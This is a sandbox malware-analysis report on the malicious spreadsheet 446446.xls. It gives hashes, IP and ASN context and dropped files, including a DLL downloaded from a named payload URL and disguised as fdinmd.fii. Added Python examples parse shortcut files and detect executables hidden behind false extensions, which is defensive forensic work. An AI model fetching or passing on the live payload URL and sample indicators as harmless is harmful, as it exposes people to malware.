                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 92.123.150.225, 20.50.102.62, 52.147.198.201, 40.88.32.150, 52.255.188.83, 92.122.145.220, 104.42.151.234, 52.109.32.63, 52.109.12.21, 52.109.12.24, 184.30.24.56, 20.82.209.104, 92.122.213.194, 92.122.213.247, 13.107.4.50, 20.82.210.154, 52.155.217.156, 20.54.26.129
                                                                                                                                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e13551.dscg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, msagfx.live.com-6.edgekey.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, elasticShed.au.au-msedge.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, au.au-msedge.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

Time | Type | Description
17:12:30 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
64.207.186.30 | 446446.xls | Get hash | malicious | Browse
• living-traditions.com/blogs/click.php

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
GO-DADDY-COM-LLCUS | 446446.xls | Get hash | malicious | Browse
• 64.207.186.30
GO-DADDY-COM-LLCUS | documents-1982636004.xlsm | Get hash | malicious | Browse
• 107.180.50.162
GO-DADDY-COM-LLCUS | documents-1982636004.xlsm | Get hash | malicious | Browse
• 107.180.50.162
GO-DADDY-COM-LLCUS | documents-466266883.xlsm | Get hash | malicious | Browse
• 107.180.50.162
GO-DADDY-COM-LLCUS | documents-466266883.xlsm | Get hash | malicious | Browse
• 107.180.50.162
GO-DADDY-COM-LLCUS | Processed APR12.xlsx | Get hash | malicious | Browse
• 192.169.223.13
GO-DADDY-COM-LLCUS | NdBLyH2h5d.exe | Get hash | malicious | Browse
• 184.168.131.241
GO-DADDY-COM-LLCUS | 4oItdZkNOZ.exe | Get hash | malicious | Browse
• 107.180.50.167
GO-DADDY-COM-LLCUS | Portfolio.exe | Get hash | malicious | Browse
• 72.167.241.46
GO-DADDY-COM-LLCUS | 12042021493876783,xlsx.exe | Get hash | malicious | Browse
• 184.168.131.241
GO-DADDY-COM-LLCUS | CIVIP-8287377.exe | Get hash | malicious | Browse
• 184.168.177.1
GO-DADDY-COM-LLCUS | MT103_004758.exe | Get hash | malicious | Browse
• 184.168.131.241
GO-DADDY-COM-LLCUS | Payment advice IN18663Q0031139I.xlsx | Get hash | malicious | Browse
• 184.168.131.241
GO-DADDY-COM-LLCUS | Swift002.exe | Get hash | malicious | Browse
• 50.62.160.230
GO-DADDY-COM-LLCUS | 36ne6xnkop.exe | Get hash | malicious | Browse
• 184.168.131.241
GO-DADDY-COM-LLCUS | 56UDmImzPe.dll | Get hash | malicious | Browse
• 107.180.90.10
GO-DADDY-COM-LLCUS | Shipping doc&_B-Landen.exe | Get hash | malicious | Browse
• 50.62.137.41
GO-DADDY-COM-LLCUS | Statement-ID261179932209970.vbs | Get hash | malicious | Browse
• 148.72.208.50
GO-DADDY-COM-LLCUS | _.ryder.com._1602499153.666014.dll | Get hash | malicious | Browse
• 166.62.30.150
GO-DADDY-COM-LLCUS | mW07jhVxX5.exe | Get hash | malicious | Browse
• 184.168.131.241

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\fdinmd.fii | 446446.xls | Get hash | malicious | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick | 446446.xls | Get hash | malicious | Browse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7313A428-7830-4ECB-88E3-B5B1143EDDDA
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):133926
                                                                                                                                                                  Entropy (8bit):5.3703247507002985
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:/cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:EVQ9DQW+zYXO8
                                                                                                                                                                  MD5:9559FA6EB738D9BC9BC6833652EB4E4D
                                                                                                                                                                  SHA1:76522723B61DE9679B0D276B600E7A8860267B01
                                                                                                                                                                  SHA-256:32E6DB996EAC4915BA6F963A9406C5B611BBBF295F24C516F99E6EC1FC0316D1
                                                                                                                                                                  SHA-512:1A5ADED8BA8EE3C2783C3FEB993A3F306C5B7531F912F9A94DDBF9BF2FC7C11C670B2237694CFE0B2A1DB3F4F227FB5EFE21D00E66A7F2186F3FC51B4F43C626
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-12T15:12:24">.. Build: 16.0.14008.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                  Category:downloaded
                                                                                                                                                                  Size (bytes):449536
                                                                                                                                                                  Entropy (8bit):5.5101637778448955
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                                                                                                                                                                  MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                                                                                                                                                                  SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                                                                                                                                                                  SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                                                                                                                                                                  SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: 446446.xls, Detection: malicious, Browse
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  IE Cache URL:http://living-traditions.com/blogs/click.php
                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AF910000
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80472
                                                                                                                                                                  Entropy (8bit):7.887674613462612
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:clJGmOQRbgrWGHKT7AeWRlMVGoIahaDHTU6hryF70KiQ:cbGmOQRbgrW2KT7g2sTU2yF70KiQ
                                                                                                                                                                  MD5:3806F1BA0C68ABABDAAD11C09F7E7C84
                                                                                                                                                                  SHA1:2B1B86584B11EE9407A39D88B5044E403D7ACDEF
                                                                                                                                                                  SHA-256:D65513C26BDE3DD4AE8DA9A7C16BE2540FD551D6D6674EEE7E0D9792881F99A1
                                                                                                                                                                  SHA-512:88ADF638FD18E386F539610589BD0AD96F247A149B93CC589DCE8A3BB0B79D2BA2BC737EC297E1613FA95A0A902EAB55AAB3D628FFDF7E0084D4246677E7966F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: .UKO.0..W.?D........,..G.T...=.X.<....co......<<..3.O.g.5..D.......J.e.~.^..Y.I8%.w.5 ;[.}...`Eh.-.S.?8G......"..V$z.K..\.%.......%p.N..-...{....7N.[..|./K.L...|....D.u.Lc".|..!.-E.z...^.R.y4.,{....).7.r.e...F.Oj@........-....qu....M.]Z.a.`...Rc....;....=9.T......./.\........Z.`. T!.....=>...v...6...../r..)..r_..\....\..g..SNLk....t.r/"._)...t....PQ<f.||8..#..]:s7..........h.]."..4lg....*.,;.....5...Of........PK..........!................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\446446.xls.LNK
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:46 2020, mtime=Mon Apr 12 23:12:27 2021, atime=Mon Apr 12 23:12:27 2021, length=110080, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2066
                                                                                                                                                                  Entropy (8bit):4.651416909086472
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:8/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6my/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6m:8/YmvxS8Da8HIB6p/YmvxS8Da8HIB6
                                                                                                                                                                  MD5:5AB3706D085881A1D4836C30CB8212C4
                                                                                                                                                                  SHA1:C6B634036314EA7D9308E7B10DE84E370DA37B9E
                                                                                                                                                                  SHA-256:EC254D08DEA693D4456B6DFA2E215A7C2F8798202D09A7CC81924AD883629625
                                                                                                                                                                  SHA-512:2C7E15C1EF6CFB4D129779ED69BF95F7B3FE735BF3F734276470B2097C2AFA1FCFC6CCEE0354DCA54BB77719710599715E110BEF4BEFF2E504F6AFE514CD7338
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: L..................F.... .......:...r."../..r."../...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S.....................r..h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny..R.......Y..............>.....7=..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....`.2..R...R.. .446446.xls..F......>Qxx.R......h......................!..4.4.6.4.4.6...x.l.s.......P...............-.......O...........>.S......C:\Users\user\Desktop\446446.xls..!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.4.6.4.4.6...x.l.s.........:..,.LB.)...As...`.......X.......724471...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h...
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Mon Apr 12 23:12:27 2021, atime=Mon Apr 12 23:12:27 2021, length=12288, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):904
                                                                                                                                                                  Entropy (8bit):4.643076575571524
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:8iRcXUV3tHuElPCH2JgUxw7GhOX+WrjAZ/2bD03DLC5Lu4t2Y+xIBjKZm:8iRbt4Uxw6uAZiDMq87aB6m
                                                                                                                                                                  MD5:EF3F360D18E0AF8661AFEACCC90C95B9
                                                                                                                                                                  SHA1:C8A408AFD5B1C569A55884F34482716D9E4E5E8A
                                                                                                                                                                  SHA-256:425B362E827F53278F7D587E1EC47AFEB3B3DA2BDBDF9E440B3B696583418954
                                                                                                                                                                  SHA-512:32EE8CA8843B2E7F5B5B79680B6856A3C417484EEC79E192BB2EA131FA0DD99A67EF24173F02040115D1D4B136D27A2CF080DE19AED4C18D7C28EF3FEC9F6333
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: L..................F........N....-...W.../..h..../...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S.....................r..h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>......$.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......724471...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
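The two shortcuts above sit in Office's Recent folder and were written by EXCEL.EXE, not by the macro: Office records every document it opens there, so they are activity artifacts rather than payloads, and the Malicious:true on 446446.xls.LNK is about the file it points to, not about the shortcut itself. For incident response they are still worth parsing: the link header carries the target's timestamps, size and attributes, the LinkInfo block carries the absolute local path, and the relative-path string shows where the document was opened from (here the Desktop, at the recorded mtime). The parser below is an added example written for this page, not part of the report or of any sandbox tooling; it decodes the MS-SHLLINK header, the LinkInfo local base path and the StringData fields, and skips the ID list. The sample shortcut it builds is constructed to mirror the fields reported for 446446.xls.LNK (Desktop target, Archive attribute, ctime 2020-09-30 14:03:46, mtime 2021-04-12 23:12:27, length 110080) and is not the dropped file's bytes; the drive serial number and ShowCommand are made up.

```python
# Added example: pull target, timestamps and paths out of a Windows .LNK (MS-SHLLINK).
import struct
from datetime import datetime, timedelta, timezone

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40))
SHOW = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def from_filetime(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def to_filetime(dt: datetime) -> int:
    return int((dt - EPOCH_1601).total_seconds()) * 10_000_000


def parse_lnk(data: bytes) -> dict:
    """Decode ShellLinkHeader, the LinkInfo local base path and StringData.
    The LinkTargetIDList is skipped, not interpreted."""
    if len(data) < 0x4C or data[:4] != b"\x4c\0\0\0" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link")
    flags, attrs, ctime, atime, wtime, size, _icon, show = struct.unpack_from(
        "<IIQQQIII", data, 20)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    local_base = None
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol, base_off, _net, _suffix = struct.unpack_from(
            "<IIIIIII", data, pos)
        if li_flags & 0x1:                      # VolumeIDAndLocalBasePath
            start = pos + base_off
            local_base = data[start:data.index(b"\0", start)].decode("cp1252")
        pos += li_size
    strings = {}
    for field, bit in STRING_FIELDS:           # fixed order per the spec
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            strings[field] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return {
        "target": local_base,
        "relative_path": strings.get("relative_path"),
        "arguments": strings.get("arguments"),
        "created": from_filetime(ctime),
        "accessed": from_filetime(atime),
        "modified": from_filetime(wtime),
        "size": size,
        "directory": bool(attrs & 0x10),       # FILE_ATTRIBUTE_DIRECTORY
        "show_command": SHOW.get(show, hex(show)),
    }


def build_sample_lnk() -> bytes:
    """Constructed shortcut (not the dropped file's bytes) mirroring the fields
    reported for 446446.xls.LNK; drive serial and ShowCommand are made up."""
    opened = datetime(2021, 4, 12, 23, 12, 27, tzinfo=timezone.utc)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID,
                         HAS_LINK_INFO | 0x08 | IS_UNICODE,      # 0x08 = HasRelativePath
                         0x20,                                    # FILE_ATTRIBUTE_ARCHIVE
                         to_filetime(datetime(2020, 9, 30, 14, 3, 46, tzinfo=timezone.utc)),
                         to_filetime(opened), to_filetime(opened),
                         110080, 0, 1, 0, 0, 0, 0)               # size, icon, SW_SHOWNORMAL
    volume = struct.pack("<IIII", 0x11, 3, 0x1234ABCD, 0x10) + b"\0"  # DRIVE_FIXED, no label
    local = b"C:\\Users\\user\\Desktop\\446446.xls\0"
    base_off = 0x1C + len(volume)
    body = volume + local + b"\0"                                  # empty CommonPathSuffix
    link_info = struct.pack("<IIIIIII", 0x1C + len(body), 0x1C, 0x1,
                            0x1C, base_off, 0, base_off + len(local)) + body
    rel = "..\\..\\..\\..\\..\\Desktop\\446446.xls"
    return header + link_info + struct.pack("<H", len(rel)) + rel.encode("utf-16-le")


if __name__ == "__main__":
    for key, value in parse_lnk(build_sample_lnk()).items():
        print(f"{key:14} {value}")
```

The three FILETIME values are the target's own timestamps as Explorer saw them when the link was written, so in a real Recent folder the write time tells you when the document was last modified, not when it was opened; the opening time is the LNK file's own mtime on disk.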
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):83
                                                                                                                                                                  Entropy (8bit):4.062636835813932
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:oyBVomMJRT3Ip273Ip2mMJRT3Ip2v:dj6J14LmJ142
                                                                                                                                                                  MD5:546FBC897E0253FD4115B55013DB9EC5
                                                                                                                                                                  SHA1:01C5E19E8AD4B7DB773765B0522E2524926CBE8E
                                                                                                                                                                  SHA-256:77F95B49BFF9A69DEC8FC0B77F48EBF54111EB7F4BDAD317A51C9A019FE250BF
                                                                                                                                                                  SHA-512:088C09B290FF9AA6E5D2BC373D19EFA034D2DF07B52A12F6B69B8B47FEA74ED6F4BD3EDDAF4B0E294E3556D752588AC7CC5B6F18B72FA391AB6091E07006D689
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..446446.xls.LNK=0..446446.xls.LNK=0..[xls]..446446.xls.LNK=0..
                                                                                                                                                                  C:\Users\user\Desktop\90A10000
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the preview shows BIFF records, a WRITEACCESS user name followed by FONT records for Calibri and Cambria, i.e. an Excel workbook stream written by EXCEL.EXE while the document was open, not a BASIC program)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):161733
                                                                                                                                                                  Entropy (8bit):6.925925053233649
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:V78rmOAIyyzElBIL6lECbgBGzP5xLm7TK2jTUqyF70virW2akHGaakHh5o78rmOQ:p8rmOAIyyzElBIL6lECbgB+P5Nm7T5UW
                                                                                                                                                                  MD5:8F620D3AB90FC12134D008C890041FDA
                                                                                                                                                                  SHA1:07FFAE23C88B756A4FA3D0C8903B996EE05A1620
                                                                                                                                                                  SHA-256:D48665C8B028E9328061DF6988465D7F5B576EE3ED3B3214EE4138CC5E3119D9
                                                                                                                                                                  SHA-512:E3430608D5E3546AB186E9C42E48B2E49245AE79750F73A39CB81F1BC005B33F6F935A6874BA099079C02360B1494C98B1765A76875D42C5876ED6EB03A36C09
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1.......?........V..C.a.l.i.b.r.i.1...@...8........V..C.a.l.i.b.r.i.1...@............V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1.......?........V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1...,...8........V..C.a.l.i.b.r.i.1.......8........V..C.a.l.i.b.r.i.1.......8........V..C.a.l.i.b.r.i.1...h...8........V..C.a.m.b.r.i.a.1.......4........V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1................V..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1...........
                                                                                                                                                                  C:\Users\user\fdinmd.fii
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):449536
                                                                                                                                                                  Entropy (8bit):5.5101637778448955
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                                                                                                                                                                  MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                                                                                                                                                                  SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                                                                                                                                                                  SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                                                                                                                                                                  SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: 446446.xls, Detection: malicious
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
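The entry above is a PE32 DLL written by EXCEL.EXE to the root of the user profile under a non-executable extension (.fii), with the file-type line and the MZ/PE preview contradicting the name. The check that catches this is cheap and does not look at the extension at all: parse the DOS and COFF headers and compare what the bytes say against what the name claims. The following Python is an added example, not tooling from the report or from Joe Sandbox; the header bytes it builds are constructed to carry the fields reported for fdinmd.fii (PE32, DLL, Intel 80386, native subsystem, five sections matching the section names visible in the preview) and are not the dropped file's contents. The section count and TimeDateStamp in the sample are assumptions.

```python
# Added example: classify a dropped PE and flag an extension that hides it.
import struct
from pathlib import PureWindowsPath

IMAGE_FILE_DLL = 0x2000
MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "arm", 0xAA64: "arm64"}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "console", 9: "windows ce gui"}
OPT_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
# Extensions Windows treats as PE images; anything else carrying MZ/PE is suspect.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi"}


def classify_pe(data: bytes):
    """Return the COFF/optional-header facts of a PE image, or None if not PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    # Subsystem sits at offset 68 of the optional header in both PE32 and PE32+.
    if opt_size < 70 or opt + 70 > len(data):
        return None
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    return {
        "format": OPT_MAGIC.get(magic, hex(magic)),
        "machine": MACHINES.get(machine, hex(machine)),
        "dll": bool(chars & IMAGE_FILE_DLL),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "sections": nsect,
        "link_timestamp": stamp,
    }


def extension_mismatch(path: str, data: bytes) -> bool:
    """True when the content is a PE image but the file name does not say so."""
    if classify_pe(data) is None:
        return False
    return PureWindowsPath(path).suffix.lower() not in PE_EXTENSIONS


def build_sample_pe32_dll() -> bytes:
    """Constructed header-only image (not fdinmd.fii) with the fields libmagic
    reported for it: PE32, DLL, Intel 80386, native subsystem."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH",
                       0x14C,        # IMAGE_FILE_MACHINE_I386
                       5,            # .text .rdata .data .pdata .reloc (assumed count)
                       0x60742B00,   # TimeDateStamp, constructed value
                       0, 0,
                       224,          # SizeOfOptionalHeader for PE32
                       0x2102)       # EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)   # PE32 magic
    struct.pack_into("<H", opt, 68, 1)      # IMAGE_SUBSYSTEM_NATIVE
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    sample = build_sample_pe32_dll()
    print(classify_pe(sample))
    print("mismatch:", extension_mismatch(r"C:\Users\user\fdinmd.fii", sample))
```

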